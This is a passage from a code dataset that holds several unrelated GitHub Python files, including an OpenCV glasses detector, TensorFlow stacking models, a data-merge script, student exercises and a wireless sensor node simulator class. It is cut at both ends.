conn","repo_name":"everthinq/hh_parser","sub_path":"hh_parser/hh_parser/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"72044430005","text":"from .common.monitor import Monitor\nfrom .common.strategies_map import get_strategies\n\n\ndef get_monitors(print_info: bool) -> list[Monitor]:\n monitors: list[Monitor] = []\n\n for S in get_strategies().values():\n s = S(verbose=print_info)\n\n s.run()\n\n monitors.extend(s.monitors)\n\n return monitors\n","repo_name":"cloudstrife9999/pymonitors","sub_path":"pymonitors/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70336934647","text":"a = \"s\"\nwhile a!= \"n\":\n n = int(input(\"Digite a quantidade de elementos do conjunto: \"))\n vet = []\n for i in range(n):\n vet.append(float(input(\"Digite os elementos do conjunto A:\")))\n print(vet)\n print(\"O tamanho do vetor é:\",len(vet))\n b = [0] * n\n for i in range(len(vet)):\n if i % 2 == 1:\n b[i] = vet[i]/2\n else:\n i + 1 % 2 == 0\n b[i] = vet[i] * 3\n print(\"B:\",b)\n print(\"Deseja relizar uma nova operação?(s/n)\")\n a = input()\nprint(\"fim do programa\")\n\n\n\n\n","repo_name":"markclz/prog1-exercicios","sub_path":"q6l4.py","file_name":"q6l4.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3392444278","text":"import numpy as np\nimport cv2\nimport copy\nGLASSES_THRESHOLD = 3\nBLUE_CUT_GLASSES_THRESHOLD = 10\nBLUE_CUT_GLASSES_THRESHOLD2 = 5\nDIFF=False#背景との差分でマスウを生成するかどうか。するなら最初に背景を取るために動画を流し、被写体がいないタイミングでescを押す。\n#正面を向いた時、ブルーライトの検出率が悪くなるので、2つ目を検出した時の閾値を別に用意している。\nHAAR_FILE = \"haarcascade_frontalface_default.xml\"\nHAAR_FILE2 = \"haarcascade_eye_tree_eyeglasses.xml\"\nHAAR_FILE3= \"haarcascade_eye.xml\"\nHAAR_FILE4= \"haarcascade_lefteye_2splits.xml\"\nHAAR_FILE5= \"haarcascade_righteye_2splits.xml\"\ncascade = cv2.CascadeClassifier(HAAR_FILE)\neye_cascade = cv2.CascadeClassifier(HAAR_FILE2)\neye_cascade2 = cv2.CascadeClassifier(HAAR_FILE3)\neye_cascade3 = cv2.CascadeClassifier(HAAR_FILE4)\neye_cascade4 = cv2.CascadeClassifier(HAAR_FILE5)\ncapture = cv2.VideoCapture(0)\n\ndef main():\n\n ret, backframe = capture.read() # スコプを伸ばすためのの記述\n while (DIFF):#背景画像を取得するので、被写体や動く物体はカメラから見えない所に置いてEscキー押してください。\n ret, backframe = capture.read()\n cv2.imshow(\"satuei\",backframe)\n if cv2.waitKey(10) == 27:\n break\n #capture.release()\n cv2.destroyAllWindows()\n\n while (True):\n ret, frame = capture.read()\n processed,mask=prepareDetection(backframe,frame)\n frame=processed\n frame_m=copy.deepcopy(frame)\n frame_m[mask == 0] = [0, 0, 0]\n img_g = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n face = cascade.detectMultiScale(img_g)\n\n # めがね判定オーバーレイ表示用画像\n frame_over = np.zeros(frame.shape, dtype = np.uint8)\n\n for (x, y, w, h) in face:\n if DIFF:#置き換え\n img_g = cv2.cvtColor(frame_m, cv2.COLOR_BGR2GRAY)\n frame = cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 0, 255), 1)\n img_eye_gray = img_g[y:y + h, x:x + w]\n img_eye = frame[y:y + h, x:x + w]\n img_upper_face=frame[y+int(h/4):y + int(h/2), x+int(w/11*2):x + int(w/11*9)]\n blue= detectBluelightCutGlasses(img_upper_face,frame,10,10)\n #print(blue)\n\n #以下cascade祭り\n eyes = eye_cascade.detectMultiScale(img_eye_gray)\n eyes2 = eye_cascade2.detectMultiScale(img_eye_gray)\n eyes3 = eye_cascade3.detectMultiScale(img_eye_gray)\n eyes4 = eye_cascade4.detectMultiScale(img_eye_gray)\n #それぞれの検出した目をeyesに集積\n if(len(eyes)>0 and len(eyes2)>0):\n eyes = np.vstack((eyes, eyes2))\n if (len(eyes) > 0 and len(eyes3) > 0):\n eyes = np.vstack((eyes, eyes3))\n if (len(eyes) > 0 and len(eyes4) > 0):\n eyes = np.vstack((eyes, eyes4))\n # 検出した目が2個以上なら\n if (len(eyes))>= 2:\n # 目の座標・右目距離・左目距離を計算\n eyePoints, rightEyeDistances, leftEyeDistances = getEyePointsAndDistances(eyes, (int(w/4), int(h/4)), (int(w*3/4), int(h/4)))\n # 左右の目に最も近い目を決定\n rightEyePos = eyePoints[rightEyeDistances.index(min(rightEyeDistances))]\n leftEyePos = eyePoints[leftEyeDistances.index(min(leftEyeDistances))]\n\n #\n if (0 <= rightEyePos[0] < w/2) and (0 <= rightEyePos[1] < h/2) and (w/2 <= leftEyePos[0] < w) and (0 <= leftEyePos[1] < h/2):\n # めがね検出\n if not detectGlasses(eyes,img_eye_gray,img_eye, rightEyePos, leftEyePos, img_eye):\n #cv2.putText(img_eye, \"GLASSES\", (0, h), cv2.FONT_HERSHEY_SIMPLEX, 2, (255, 255, 255), 2, cv2.LINE_AA)\n cv2.circle(frame_over, (int(x + w/2), int(y + h/2)), int(0.35*(w+h)), (0, 255, 0), thickness = int(0.05*(w+h)), lineType = cv2.LINE_AA)\n else:\n #cv2.putText(img_eye, \"NOT GLASSES\", (0, h), cv2.FONT_HERSHEY_SIMPLEX, 2, (255, 255, 255), 2, cv2.LINE_AA)\n s = int(0.03 * (w + h))\n t = s * 2\n wh = int(w/2)\n hh = int(h/2)\n p = np.array([[x + s, y - s], [x + wh, y + hh - t], [x + w - s, y - s], [x + w + s, y + s], [x + wh + t, y + hh], [x + w + s, y + h - s], [x + w - s, y + h + s], [x + wh, y + hh + t], [x + s, y + h + s], [x - s, y + h - s], [x + wh - t, y + hh], [x - s, y + s]]).reshape(1, -1, 2)\n cv2.fillPoly(frame_over, p, (0, 0, 255))\n \n if blue>BLUE_CUT_GLASSES_THRESHOLD:#ブルーライトカット眼鏡検出1\n\n cv2.putText(img_upper_face, \"Bluelight Cut Glasses\", (0, 25), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2, cv2.LINE_AA)\n for (ex, ey, ew, eh) in eyes:\n cv2.rectangle(img_eye, (ex, ey), (ex + ew, ey + eh), (0, 255, 0), 1)\n # めがね判定オーバーレイ表示用画像重ね合わせ\n frame = np.clip((frame + 0.9 * frame_over), 0, 255).astype(np.uint8)\n\n cv2.imshow('frame',frame)\n if cv2.waitKey(10) == 27:\n break\n\n capture.release()\n cv2.destroyAllWindows()\n\ndef prepareDetection(bgimg,img):\n if(img is not None):\n framemask=backgroundMask(bgimg,img)\n img_g = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n img_3 = cv2.adaptiveThreshold(img_g, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 155, 30)\n img_3_3 = cv2.cvtColor(img_3, cv2.COLOR_GRAY2BGR)\n img_3_3 = cv2.GaussianBlur(img_3_3, (11, 11), 12)\n img_diff = cv2.absdiff(img, img_3_3) # 差分計算\n\n # img_diff[np.where((img_diff == [255,255,255]).all(axis=2))] = [240/2,221/2,195/2]#色の塗りつぶし(色の変換)\n\n img = cv2.addWeighted(img, 0.95, img_diff, 0.05, 3) # 画像合成\n # img=cv2.add(img,img_diff)\n\n return img,framemask\ndef detectBluelightCutGlasses(img,img_face,s,v):#svはhsvのsv\n # 青い眼鏡、青い髪、青い入れ墨等は誤認識します。\n #青色の範囲をHSVで指定して収集(frame_mask)\n #全体に青みがかってる場合の調整値を求める\n img_face = cv2.cvtColor(img_face, cv2.COLOR_BGR2HSV)\n lower = np.array([75, s, v])\n upper = np.array([135, 100, 100])\n frame_mask2 = cv2.inRange(img_face, lower, upper)\n average2 = np.mean(frame_mask2)\n #調整ありきで目の周辺の青色取得\n img=cv2.cvtColor(img,cv2.COLOR_BGR2HSV)\n lower = np.array([75, s+int(average2), v+int(average2)])\n upper = np.array([135, 100, 100])\n frame_mask = cv2.inRange(img, lower, upper)\n average = np.mean(frame_mask)\n\n\n cv2.imshow(\"bluelight\",frame_mask)#確認用\n return average\n\ndef getEyePointsAndDistances(eyes, rightEyePos, LeftEyePos):\n \"\"\"\n 目の座標・右目距離・左目距離を返す。\n\n eyes : 目の座標のタプル\n rightEyePos : 右目の座標\n LeftEyePos : 左目の座標\n\n return 目の座標・右目距離・左目距離(それぞれがリスト)\n \"\"\"\n points = []\n rightEyeDistances = []\n leftEyeDistances = []\n for (x, y, w, h) in eyes:\n point = (int(x + w / 2), int(y + h / 2))\n points.append(point)\n rightEyeDistances.append(getDistance2(point, rightEyePos))\n leftEyeDistances.append(getDistance2(point, LeftEyePos))\n return points, rightEyeDistances, leftEyeDistances\n\n\ndef getDistance2(p1, p2):\n \"\"\"\n 2点間の距離の2乗を計算する。\n\n p1, p2 : 点の座標のタプル (x, y)\n \"\"\"\n return ((p1[0] - p2[0]) ** 2) + ((p1[1] - p2[1]) ** 2)\n\n\ndef clip(x, min, max):\n \"\"\"\n xをmin以上max以下の値にする。\n \"\"\"\n if x <= min:\n return min\n if x >= max:\n return max\n return x\n\n\ndef detectGlasses(eyes,img,img_color, eye1Pos, eye2Pos, debugImg = None):\n \"\"\"\n めがねが存在するか判定する。\n\n img : 顔画像(グレースケール)\n eyeXPos : X個目の目の座標のタプル (x, y)\n debugImg : デバッグ情報を書く画像(省略可)\n\n return True / False\n \"\"\"\n img_hsv = cv2.cvtColor(img_color, cv2.COLOR_BGR2HSV)\n lower = np.array([-33/2, 0, 50])\n upper = np.array([64/2, 100, 100])\n frame_mask = cv2.inRange(img_hsv, lower, upper)\n frame_mask = cv2.GaussianBlur(frame_mask, (21, 21), 12)\n frame_mask=cv2.cvtColor(frame_mask,cv2.COLOR_GRAY2BGR)\n img_color=cv2.addWeighted(img_color,0.9,frame_mask,0.1,3)\n # 目の中心座標の計算\n eyeCenter = ((eye1Pos[0] + eye2Pos[0]) / 2, (eye1Pos[1] + eye2Pos[1]) / 2)\n\n # 目のX方向の距離を計算\n eyeDistance = abs(eye1Pos[0] - eye2Pos[0])\n if eyeDistance < min(img.shape[0], img.shape[1]) / 20:\n eyeDistance = int(min(img.shape[0], img.shape[1]) / 20)\n\n # 画像のエッジを求める\n img_2 = cv2.Canny(img, 50, 250)\n\n for (ex, ey, ew, eh) in eyes:#目の辺りを黒塗りにして差をつける\n img_2 = cv2.rectangle(img_2, (ex, ey), (ex + ew, ey + eh), (0, 0, 0), cv2.FILLED)\n\n # 目の周辺を切り出し2\n x4 = clip(int(eyeCenter[0] + eyeDistance/7), 0, img.shape[1])\n x3 = clip(int(eyeCenter[0] - eyeDistance/7), 0, img.shape[1])\n y3 = clip(int(eyeCenter[1] - eyeDistance ), 0, img.shape[0])\n y4 = clip(int(eyeCenter[1] + eyeDistance ), 0, img.shape[0])\n #img_2 = cv2.rectangle(img_2, (int(img_2.shape[0]/10*4), 0), (int(img_2.shape[0]/10*6), img_2.shape[1]), (0, 0, 0), cv2.FILLED) # 鼻の線を��したい。\n img_2 = cv2.rectangle(img_2, (x3, y3), (x4, y4), (0, 0, 0), cv2.FILLED)\n\n cv2.imshow(\"img_2\", img_2)\n # 目の間周辺の画像を切り出し\n x2 = clip(int(eyeCenter[0] + eyeDistance), 0, img.shape[1])\n x1 = clip(int(eyeCenter[0] - eyeDistance), 0, img.shape[1])\n y1 = clip(int(eyeCenter[1] - eyeDistance / 2), 0, img.shape[0])\n y2 = clip(int(eyeCenter[1] + eyeDistance / 2), 0, img.shape[0])\n img_betweenEyes = img_2[y1:y2, x1:x2]\n img_betweenEyes_color = img_color[y1:y2, x1:x2]\n\n #ブルーライトカット眼鏡検出2\n blue = detectBluelightCutGlasses(img_betweenEyes_color,img_color, 10, 15)\n print(str(blue) + \"blue\")\n if blue > BLUE_CUT_GLASSES_THRESHOLD2:\n cv2.putText(img_color, \"Bluelight Cut Glasses\", (0, 25), cv2.FONT_HERSHEY_SIMPLEX, 0.5,\n (255, 255, 255), 2, cv2.LINE_AA)\n # 平均の明るさを計算\n average = np.mean(img_betweenEyes)\n print(average)\n\n # デバッグ用\n if debugImg is not None:\n img_2=cv2.cvtColor(img_2,cv2.COLOR_GRAY2BGR)\n debugImg=cv2.addWeighted(img_2,0.5,img_color,0.5,3)\n '''debugImg[:, :, 0] = img_2\n debugImg[:, :, 1] = img_2\n debugImg[:, :, 2] = img_2'''\n\n cv2.line(debugImg, eye1Pos, eye2Pos, (255, 0, 0), 2, cv2.LINE_AA)\n cv2.rectangle(debugImg, (x1, y1), (x2, y2), (255, 0, 0), 1)\n\n if average >= GLASSES_THRESHOLD:\n return True\n else:\n return False\n\ndef backgroundMask(bgimg,img):#マスクを作る\n img_diff = cv2.absdiff(bgimg, img)#背景との差分\n img_diff = cv2.GaussianBlur(img_diff, (51, 51), 12)#ノイズ除去\n img_diff=cv2.cvtColor(img_diff,cv2.COLOR_BGR2GRAY)\n et, img_diff = cv2.threshold(img_diff, 20, 255, cv2.THRESH_BINARY)#二値化\n kernel = np.ones((3, 3), dtype=np.uint8)\n for i in range(10):#黒い穴を埋める\n img_diff = cv2.dilate(img_diff, kernel) # 白が膨張\n img_diff = cv2.erode(img_diff, kernel) # 黒が膨張\n\n img_diff = cv2.morphologyEx(img_diff, cv2.MORPH_CLOSE, kernel) # モルフォロジー。第二で方式を選択。\n if DIFF:\n cv2.imshow(\"img_diff\",img_diff)\n return img_diff\n\nif __name__ == '__main__':\n main()","repo_name":"sachsen/glasses_detection","sub_path":"glasses_detection/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11955,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"33499064228","text":"import tensorflow as tf\nimport numpy as np\nfrom cnn_rnn.HyMultiNN import RecurrentNeuralNetwork, FCNN, CNN\nimport time\n\ndef stacking_CNN(x, arg_dict, keep_prob, name):\n '''\n stacking策略中CNN子学习器\n :param x: Tensor\n :param arg_dict: cnn和fc所需所有权重和偏置值散列表\n :param keep_prob: dropout参数\n :param name: 计算节点命名\n :return: 全连接层最后输出一个最优半径值\n '''\n cnn = CNN()\n #两个维度一样的卷积层,一个池化层,一个全连接层\n with tf.name_scope('conv_layer'):\n conv_1, training_1, extra_update_ops_1 = cnn.conv2d(x, arg_dict['wc1'], arg_dict['bc1'], strides=1, use_bn='no')\n conv_2, training_2, extra_update_ops_2 = cnn.conv2d(conv_1, arg_dict['wc2'], arg_dict['bc2'], strides=1, use_bn='no')\n pooling_2 = cnn.pooling(style=tf.nn.max_pool, x=conv_2, k= 2)\n with tf.name_scope('fc_layer'):\n fc1_input = tf.reshape(pooling_2, [-1, arg_dict['wd1'].get_shape().as_list()[0]])\n if (training_1 or training_2) == None:\n keep_prob = 0.8\n fcnn = FCNN(fc1_input, keep_prob)\n fc = fcnn.per_layer(arg_dict['wd1'], arg_dict['bd1'])\n out = fcnn.per_layer(arg_dict['wd2'], arg_dict['bd2'], param= fc, name= name)\n\n return out\n\ndef stacking_GRU(x, num_units, arg_dict, name):\n '''\n stacking策略中的RNN子学习器\n :param x: type= 'ndarray' / 'Tensor'\n :param num_units: lstm/gru隐层神经元数量\n :param arg_dict: 全连接层权重以及偏置量矩阵散列\n :param name: 计算节点命名\n :return: MULSTM模型最终输出\n '''\n with tf.name_scope('multi_LSTMorGRU'):\n # 生成RecurrentNeuralNetwork对象\n\n #一层一对一输出隐层状态的GRU/LSTM,一层多对一输出隐层状态的GRU/LSTM,\n # 衔接一层神经元结点为上一层一半的fc层,再衔接一层神经元数量为上一层一半的fc层\n recurrentnn = RecurrentNeuralNetwork(x, keep_prob=0.8)\n # 添加layer_num层LSTM结点组合\n # LSTM\n # cells = recurrentnn.multiLSTM(net_name='LSTM', num_unit=num_units, layer_num=2)\n # GRU\n cells = recurrentnn.multiLSTM(net_name='GRU', num_unit= num_units, layer_num= 2)\n # outputs.shape= [batch_size, max_time, hide_size]\n # (lstm)multi_state= ((h, c), (h, c)), (gru)multi_state= (h, h) h.shape= [batch_size, hide_size]\n outputs, multi_state = recurrentnn.dynamic_rnn(cells, x, max_time= 5) #若特征数24则分成6份,若特征数20则分成5份\n # LSTM\n # result = multi_state[-1].h\n # GRU\n result = multi_state[-1]\n # 生成FCNN对象\n\n with tf.name_scope('fc'):\n fcnn = FCNN(result, keep_prob=1.0)\n net_1 = fcnn.per_layer(arg_dict['w_1'], arg_dict['b_1'])\n net_2 = fcnn.per_layer(arg_dict['w_2'], arg_dict['b_2'], param= net_1)\n out = fcnn.per_layer(arg_dict['w_3'], arg_dict['b_3'], param= net_2, name= name)\n return out\n\ndef stacking_FC(x, arg_dict, name):\n '''\n 元学习器为两层全连接层\n :param x: Tensor, 所有子学习器生成的数据集\n :param arg_dict: 权重矩阵以及偏置值散列表\n :param name: 计算节点命名\n :return: 全连接网络输出, shape= [1]\n '''\n #生成FCNN对象\n fcnn = FCNN(x)\n net_1 = fcnn.per_layer(arg_dict['w_sub_1'], arg_dict['b_sub_1'])\n net_2 = fcnn.per_layer(arg_dict['w_sub_2'], arg_dict['b_sub_2'], param= net_1)\n net_3 = fcnn.per_layer(arg_dict['w_sub_3'], arg_dict['b_sub_3'], param= net_2, name= name)\n return net_3","repo_name":"tonylibing/ProximityDetection","sub_path":"cnn_rnn/sub_learning.py","file_name":"sub_learning.py","file_ext":"py","file_size_in_byte":3608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14197883760","text":"import pandas as pd\nimport pickle\nimport os\nimport fnmatch\n\ncolumns = ['name', 'type', 'priority']\n\ngeneral_company_attributes = ['location', 'category', 'stage', 'social_media', 'age',\n 'create_time', 'close_time', 'employees', 'type']\nmeta_information_attributes = ['name', 'URL', 'update_time', 'description']\n\ndata = {}\n\n# 1: StartUs, 2: Startupers, 3: Company House, 4: News Website\nfor attribute in general_company_attributes:\n data[attribute] = ['General Company', [4, 1, 3, 2]]\nfor attribute in meta_information_attributes:\n data[attribute] = ['Meta Information', [4, 1, 3, 2]]\n\nwith open('attributes.pickle', 'wb') as file:\n pickle.dump(data, file)\n\nattributes = meta_information_attributes + general_company_attributes\nattributes.append('source')\n\n\ndef search_merge(old, new, new_priority, attributes):\n source = old['source'].replace(' ', '')\n for index in new.index:\n if index in old.index:\n old_priority = int(source[old.index.get_loc(index)])\n priority = attributes[index]\n if old_priority == 0 or priority[1].index(new_priority) < priority[1].index(old_priority):\n old[index] = new[index]\n return old\n\ndef find_path(dir):\n fileList = []\n # 遍历项目中的所有文件和文件夹\n for root, dirs, files in os.walk(dir):\n for file in files:\n # 使用fnmatch模块的fnmatch函数进行文件名匹配\n if fnmatch.fnmatch(file, '*info*'):\n # 打印匹配到的文件路径\n file_path = os.path.join(root, file)\n # file_path.replace('/', '//')\n print(file_path)\n fileList.append(file_path)\n return fileList\n\n\ndef merge_info(direct):\n fileList = find_path(direct)\n columns = attributes\n data = pd.DataFrame([], columns=columns)\n for file in fileList:\n df = pd.read_csv(file)\n data = pd.concat([data, df])\n\n data_unique = data.drop_duplicates(subset=['name'])\n data_unique.to_csv('./data/org_info.csv', encoding='utf-8', index=False)","repo_name":"csynbiosys/dissertations-2023-info","sub_path":"Jiayan_liu_find/data_preprocessing.py","file_name":"data_preprocessing.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2592806884","text":"# Jogar um dado de 6 lados por n vezes\n# verificar se o numero retornado pelo dado é par ou impar\n# se o numero for impar, continue a verificação\n# se o numero for par, exiba uma mensagem de 'ACERTOU'\n# se o numero do dado for impar, chame o else e imprima \"IMPAR\"\nfrom random import randint\n\n\ndef sort_dado():\n return randint(1, 6)\n\n\nif __name__ == \"__main__\":\n dado = sort_dado()\n for x in range(7):\n if x % 2 == 1:\n continue\n if x == dado:\n print(\"Você acertou! numero: \", x, \"dado: \", dado)\n break\n else:\n print(\"Você errou! dado: \", dado)\n","repo_name":"V1ctorW1ll1an/curso_python","sub_path":"secao_07_estruturas_de_controle/desafio_dado.py","file_name":"desafio_dado.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6329090456","text":"#!/usr/bin/env python3.6\n\nimport os\nimport numpy as np\nimport torch\nfrom easypbr import *\nfrom dataloaders import *\n\n\npred_folder=\"/media/rosu/Data/data/semantic_kitti/predictions/after_icra_experiments_fixed_deform_none/test\"\n\nout_folder=\"/media/rosu/Data/data/semantic_kitti/for_server/after_icra_experiments_fixed_deform_none\"\n\n\nconfig_file=\"lnn_compare_semantic_kitti.cfg\"\nconfig_path=os.path.join( os.path.dirname( os.path.realpath(__file__) ) , '../../config', config_file)\nview=Viewer.create(config_path)\nloader=DataLoaderSemanticKitti(config_path)\nloader.start()\n\n\n#inside the pred folder we must go though all of the sequences and read the .label and then write it to binary\nsequences = [ f.path for f in os.scandir(pred_folder) if f.is_dir() ]\nprint(\"sequences is \", sequences)\nfor seq_folder in sequences:\n seq=os.path.basename(seq_folder)\n out_folder_with_sequences=os.path.join(out_folder, \"sequences\", seq, \"predictions\" )\n print(\"out_folder_with_sequences \", out_folder_with_sequences)\n os.makedirs(out_folder_with_sequences, exist_ok=True)\n files = [f for f in os.listdir(seq_folder) if os.path.isfile(os.path.join(seq_folder, f))]\n nr_files_for_seq=0\n for file_basename in files:\n file=os.path.join(seq_folder, file_basename)\n name_no_basename = os.path.splitext(file)[0]\n extension = os.path.splitext(file)[1]\n if extension==\".label\":\n nr_files_for_seq+=1\n labels = np.loadtxt(file)\n out_file=os.path.join(out_folder_with_sequences, file_basename)\n # print(\"writing in\", out_file)\n f= open(out_file,\"w+\")\n labels=labels.astype(np.int32)\n labels.tofile(f)\n\n #sanity check \n a = np.fromfile(out_file, dtype=np.uint32)\n print(\"a is \", a)\n print(\"labels is \", labels)\n diff = (a!=labels).sum()\n print(\"diff is\", diff)\n\n #read also the gt\n if(loader.has_data()): \n cloud=loader.get_cloud()\n mesh=Mesh( os.path.join(out_folder_with_sequences, (name_no_basename+\"_gt.ply\") ) )\n mesh.L_pred=a\n mesh.m_label_mngr=cloud.m_label_mngr\n mesh.m_vis.set_color_semanticpred()\n Scene.show(mesh,\"mesh\")\n view.update()\n\n \n \n\n\n\n\n print(\"nr_file_for_seq\", nr_files_for_seq)\n\n\n","repo_name":"AIS-Bonn/lattice_net","sub_path":"latticenet_py/misc/prepare_submission_semantickitti.py","file_name":"prepare_submission_semantickitti.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"76"} +{"seq_id":"42228114234","text":"from wsntk.models import NoConsumption, ExponentialConsumption\n\nfrom abc import ABCMeta, abstractmethod\nfrom numpy.random import rand\n\nRADIO_CONFIG = {\"DEFAULT\": {\"min_tx_power\": -15.0, \"max_tx_power\": 27.0, \"rx_sensitivity\": -80.0, \"frequency\": 933e6},\n \"ESP32-WROOM-32U\": {\"min_tx_power\": -12.0, \"max_tx_power\": 9.0, \"rx_sensitivity\": -97.0, \"frequency\": 2.4e9}}\n\nSENSOR_MAX_ENERGY = 100\nSENSOR_MIN_ENERGY = 0.1\n\nclass BaseNode(metaclass=ABCMeta):\n\t\"\"\"Base class for sensor node.\"\"\"\n\n\tdef __init__(self, dimensions):\n\t\t\n\t\tself.dimensions = dimensions\n\t\tself._init_node()\n\n\tdef _init_node(self):\n\t\tndim = len(self.dimensions)\n\t\tself.position = rand(ndim) * self.dimensions\n\n\tdef set_position(self, position):\n\t\t\"\"\"\n\t\tSet node position\n\t\t\n\t\tParameters\n\t\t----------\n\t\tposition : tuple of Double\n\t\t The x and y position of the sensor.\n\t\t\n\t\tReturns\n\t\t-------\n\t\tNo data returned\n\t\t\"\"\"\n\t\tndim = len(self.dimensions)\n\n\t\tif(ndim != len(position)):\n\t\t\traise ValueError(\"Position lenght different then expected. Expected %s, received %s.\" %(ndim, len(position))) \n\t\t\n\t\tfor index in range(ndim):\n\t\t\tif (position[index] > self.dimensions[index]):\n\t\t\t\traise ValueError(\"Position exceeded dimensions limits.\")\n\t\t\n\t\tself.position = position \n\t\t\n\tdef get_position(self):\n\t\t\"\"\"\n\t\tGet node position\n\t\t\n\t\tParameters\n\t\t----------\n\t\tNo parameters.\n\t\t\n\t\tReturns\n\t\t-------\n\t\tTuple of Double\n\t\t The current x and y position of the sensor\n\t\t\"\"\"\n\t\treturn self.position\n\n\tdef _update_position(self):\n\t\t\"\"\" Update the sensor position based on mobility models \"\"\"\n\t\t#ndim = len(self.position)\n\t\t#step = 0.1*rand(ndim)\n\t\t#self.position = self.position + step\n\t\treturn self.position\n\n\t@abstractmethod\n\tdef __iter__(self):\n\t\t\"\"\"Used to return an iteractor from a node\"\"\"\n\t\traise NotImplementedError\n\n\t@abstractmethod\n\tdef __next__(self):\n\t\t\"\"\"Interator next\"\"\"\n\t\traise NotImplementedError\n\nclass SensorNode(BaseNode):\n\t\"\"\"\n\tSensor node class.\n\t\t\n\tRequired arguments:\n\t\t\n\t\t*dimensions*:\n\t\tTuple of doubles, the area limits of the sensor.\n\t\t \n\t\t*radio*:\n\t\tEnumerator , the radio type to be used in the sensor.\n\t\t\n\t\t*consumption*\n\t\tString, the energy consumption model.\n\t\t\n\t\t*scaling*\n\t\tDouble, a hardware-dependent and battery-dependent proportionality constant that converts transmition power into consumed energy.\n\t\t\t\n\t\t\tunits of energy = tx_power*scaling \n\t\"\"\"\n\t\n\tconsumption_models = {\n\t\t\"None\": (NoConsumption,),\n\t\t\"Exponential\": (ExponentialConsumption,),\n\t}\n\t\n\tdef __init__(self, dimensions, radio = \"DEFAULT\", consumption = \"None\", scaling = 1.0):\n\t\t\n\t\tsuper(SensorNode, self).__init__(dimensions)\n\t\t#initialize radio configuration\n\t\tself._set_radio_config(radio)\n\t\t#initialize consumption model\n\t\tself.cons_model = self._set_consumption(consumption, scaling)\n\t\t# set node as active\n\t\tself.activity = 1\n\t\t#set maximm residual energy\n\t\tself.residual = SENSOR_MAX_ENERGY\n\t\t\n\tdef _set_radio_config(self, radio_type):\n\t\t\"\"\" Collect the radio parameters used in the sensor \"\"\"\n\n\t\tradio_params = self._get_radio_params(radio_type)\n\t\tfor param in radio_params: \n\t\t\tif param == \"max_tx_power\":\n\t\t\t self.max_tx_power = radio_params[param]\n\t\t\telif param == \"min_tx_power\":\n\t\t\t self.min_tx_power = radio_params[param]\n\t\t\telif param == \"rx_sensitivity\":\n\t\t\t self.rx_sensitivity = radio_params[param]\n\t\t\telif param == \"frequency\":\n\t\t\t self.frequency = radio_params[param]\n\t\t\telse:\n\t\t\t\traise ValueError(\"Radio parameter not expected: %s.\" %(param))\n\t\t\n\t\t#initialize radio with maximun tx_power \n\t\tself.tx_power = self.max_tx_power \n\n\tdef _set_consumption(self, consumption, scaling):\n\t\t\"\"\"Set ``Consumption Class`` object for str ``consumption``. \"\"\"\n\t\ttry:\n\t\t\tmodel_ = self.consumption_models[consumption]\n\t\t\tmodel_class, args = model_[0], model_[1:]\n\t\t\tif consumption in ('Exponential'):\n\t\t\t\targs = (scaling,)\n\t\t\treturn model_class(*args)\n\t\texcept KeyError as e:\n\t\t\traise ValueError(\"The consumption model %s is not supported. \" % consumption) from e\n\t\t\t\n\tdef _get_radio_params(self, radio_type):\n\t\t\"\"\" Retrieve the radio parameters based on specified type \"\"\"\n\t\tradio_type = str(radio_type).upper()\n\t\ttry:\n\t\t\treturn RADIO_CONFIG[radio_type]\n\t\texcept KeyError as e:\n\t\t\traise ValueError(\"Radio %s is not supported.\" % radio_type) from e\n\n\tdef _update_energy(self):\n\t\t\"\"\" Update the sensor energy based on consumption models \"\"\"\n\t\t\n\t\tself.residual = self.residual*self.cons_model.consumption(self.tx_power)\n\t\t\t\t\t\n\t\treturn self.residual\n\n\tdef _update_activity(self):\n\t\t\"\"\" Update the sensor life status based on current energy residual\"\"\"\n\t\tif self.residual > SENSOR_MIN_ENERGY:\n\t\t\tself.activity = 1\t\t\n\t\telse:\n\t\t\tself.activity = 0\n\t\t\n\t\treturn self.activity\t\n\n\tdef set_txpower(self, tx_power):\n\t\t\"\"\"\n\t\tSet radio transmission power\n\t\t\n\t\tParameters\n\t\t----------\n\t\ttx_power : {double}\n\t\t\tTransmission power to be configured in the radio\n\t\t\n\t\tReturns\n\t\t-------\n\t\tNo data returned\n\t\t\"\"\"\n\t\t\n\t\tif((tx_power >= self.min_tx_power) and (tx_power <= self.max_tx_power)):\n\t\t\tself.tx_power = tx_power \n\t\telse:\n\t\t\traise ValueError(\"Parameter out of radio power specification. Expected value from %s dBm to %s dBm.\" %(self.min_tx_power, self.max_tx_power))\n\t\t\t\t\t\t\n\n\tdef get_txpower(self):\n\t\t\"\"\"\n\t\tGet radio transmission power\n\t\t\n\t\tParameters\n\t\t----------\n\t\tNo parameters\n\t\t\n\t\tReturns\n\t\t-------\n\t\tdouble number\n\t\t\tThe current configured transmission power\n\t\t\"\"\"\n\t\treturn self.tx_power\n\n\tdef get_rxsensitivity(self):\n\t\t\"\"\"\n\t\tGet radio receiver sensitivity\n\t\t\n\t\tParameters\n\t\t----------\n\t\tNo parameters\n\t\t\n\t\tReturns\n\t\t-------\n\t\tdouble number\n\t\t\tThe current configured receiver sensitivity\n\t\t\"\"\"\n\t\treturn 